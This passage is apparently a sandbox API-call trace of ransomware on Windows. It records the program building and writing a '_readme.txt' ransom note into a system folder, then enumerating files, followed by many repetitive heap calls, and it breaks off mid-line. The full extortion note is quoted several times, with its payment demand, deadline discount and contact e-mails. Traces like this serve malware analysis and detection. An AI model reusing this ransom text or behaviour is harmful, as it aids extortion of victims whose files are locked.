(HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.752] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0173.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.752] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.752] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.752] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.753] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.753] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.754] CloseHandle (hObject=0x690) returned 1 [0173.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.754] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e5978e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.754] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e5978e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.754] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.754] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e5978e0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e5978e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.754] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e5978e0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e5978e0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e5978e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.754] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.755] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.757] HeapFree (in: 